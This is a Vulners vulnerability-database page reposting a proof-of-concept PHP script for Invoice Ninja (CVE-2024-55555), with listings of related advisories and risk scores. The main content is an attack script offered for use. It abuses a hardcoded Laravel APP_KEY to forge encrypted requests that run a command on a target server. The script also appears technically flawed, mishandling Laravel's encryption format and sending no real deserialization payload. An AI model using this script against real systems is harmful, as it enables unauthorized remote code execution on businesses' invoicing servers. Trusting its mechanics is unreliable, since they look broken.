Vulners
Lucene search
📄 Invoice Ninja 5.8.22 PHP Code Injection
| Reporter | Title | Published | Views | Family All 13 |
|---|---|---|---|---|
 | Invoice Ninja 5.10.10 Insecure Deserialization / Remote Code Execution Exploit | 25 Feb 202500:00 | – | zdt |
 | Exploit for CVE-2024-55555 | 31 Jul 202523:46 | – | githubexploit |
 | CVE-2024-55555 | 7 Jan 202516:43 | – | circl |
 | Invoice Ninja 代码问题漏洞 | 7 Jan 202500:00 | – | cnnvd |
 | CVE-2024-55555 | 7 Jan 202500:00 | – | cve |
 | CVE-2024-55555 | 7 Jan 202500:00 | – | cvelist |
 | Invoice Ninja unauthenticated PHP Deserialization Vulnerability | 25 Feb 202518:53 | – | metasploit |
 | CVE-2024-55555 | 7 Jan 202517:15 | – | nvd |
 | Invoice Ninja 5.10.10 Insecure Deserialization / Remote Code Execution | 25 Feb 202500:00 | – | packetstorm |
 | PT-2024-36551 · Unknown · Invoice Ninja | 13 Dec 202400:00 | – | ptsecurity |
10
=============================================================================================================================================
| # Title : Invoice Ninja v 5.8.22 PHP Code Injection Vulnerability |
| # Author : indoushka |
| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 136.0.0 (64 bits) |
| # Vendor : https://invoiceninja.com/ |
=============================================================================================================================================
POC :
[+] Dorking İn Google Or Other Search Enggine.
[+] Code Description: A vulnerability in Invoice Ninja can also be exploited via a non-proficient character control attack using Laravel APP_KEY.
(Related : https://packetstorm.news/files/id/189419/ Related CVE numbers: CVE-2024-55555) .
[+] save code as poc.php.
[+] line 85 set target.
[+] Usage = php poc.php
[+] PayLoad :
<?php
// تعريف الدالة التي ستنفذ الأمر
function execute_command($url, $command, $app_key) {
$cipher_mode = 'AES-256-CBC';
// إرسال الطلب GET إلى نقطة النهاية
$response = send_request($url, 'GET', 'application/x-www-form-urlencoded', 'login');
if ($response['code'] != 200) {
die("لا يوجد استجابة صالحة من الهدف.");
}
// فك التشفير باستخدام APP_KEY
$xsrf_token = extract_xsrf_token($response['cookies']);
if (!$xsrf_token) {
die("لم يتم العثور على XSRF-TOKEN.");
}
$decrypted_value = laravel_decrypt($xsrf_token, $app_key, $cipher_mode);
if (!$decrypted_value) {
die("فك التشفير باستخدام APP_KEY فشل.");
}
echo "APP_KEY صالح: " . $app_key . "\n";
echo "القيمة المفكوكة: " . $decrypted_value . "\n";
// تجهيز الحمولة المشفرة
$payload = base64_encode($command); // استبدل بـ payload الخاص بك
$encrypted_payload = laravel_encrypt($payload, $app_key, $cipher_mode);
if (!$encrypted_payload) {
die("فشل التشفير باستخدام Laravel.");
}
// تنفيذ الأمر
send_request($url, 'GET', 'application/x-www-form-urlencoded', "route/$encrypted_payload");
}
// دالة إرسال الطلب
function send_request($url, $method, $content_type, $endpoint) {
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $url . $endpoint);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_HTTPHEADER, [
'Content-Type: ' . $content_type
]);
curl_setopt($ch, CURLOPT_CUSTOMREQUEST, $method);
$response = curl_exec($ch);
$http_code = curl_getinfo($ch, CURLINFO_HTTP_CODE);
$cookies = curl_getinfo($ch, CURLINFO_COOKIELIST);
curl_close($ch);
return ['code' => $http_code, 'cookies' => $cookies, 'response' => $response];
}
// دالة استخراج XSRF-TOKEN من الكوكيز
function extract_xsrf_token($cookies) {
foreach ($cookies as $cookie) {
if (strpos($cookie, 'XSRF-TOKEN') !== false) {
preg_match('/XSRF-TOKEN=([^;]+)/', $cookie, $matches);
return $matches[1];
}
}
return null;
}
// دالة فك التشفير
function laravel_decrypt($ciphertext, $key, $cipher_mode) {
// هنا يمكن استخدام خوارزمية AES لفك التشفير
// استخدم مكتبة OpenSSL في PHP لهذا الغرض
return openssl_decrypt(base64_decode($ciphertext), $cipher_mode, base64_decode($key), OPENSSL_RAW_DATA);
}
// دالة التشفير
function laravel_encrypt($plaintext, $key, $cipher_mode) {
// استخدم مكتبة OpenSSL في PHP للتشفير
return openssl_encrypt($plaintext, $cipher_mode, base64_decode($key), OPENSSL_RAW_DATA);
}
// استدعاء الوظائف مع القيم المناسبة
$url = "https://target.com";
$app_key = "base64:RR++yx2rJ9kdxbdh3+AmbHLDQu+Q76i++co9Y8ybbno=";
$command = "ls -la"; // استبدل بالأمر المطلوب
execute_command($url, $command, $app_key);
?>
Greetings to :=====================================================================================
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|
===================================================================================================Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
17 Dec 2025 00:00Current
7.7High risk
Vulners AI Score7.7
CVSS 3.18.8
EPSS0.065
SSVC